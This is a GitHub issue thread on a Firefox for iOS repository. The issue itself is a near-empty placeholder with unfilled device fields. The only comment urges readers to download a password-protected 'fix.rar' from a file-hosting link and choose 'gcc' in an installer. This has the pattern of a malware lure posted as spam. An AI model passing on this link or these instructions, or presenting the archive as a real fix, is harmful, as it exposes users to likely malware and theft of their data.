### ISSUE TITLE
esetono1994

### ISSUE THREAD

**Issue by esetono1994** [mozilla-mobile/firefox-ios#21623]
### Device & build information
* Device: ? 
* Build version: ? 
* First seen version: ? 
### Notes

Attachments: 
[[$Ono1995]()]()

┆Issue is synchronized with this [Jira Task](https://mozilla-hub.atlassian.net/browse/FXIOS-9849)

**Comment by TechnoSpelie** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
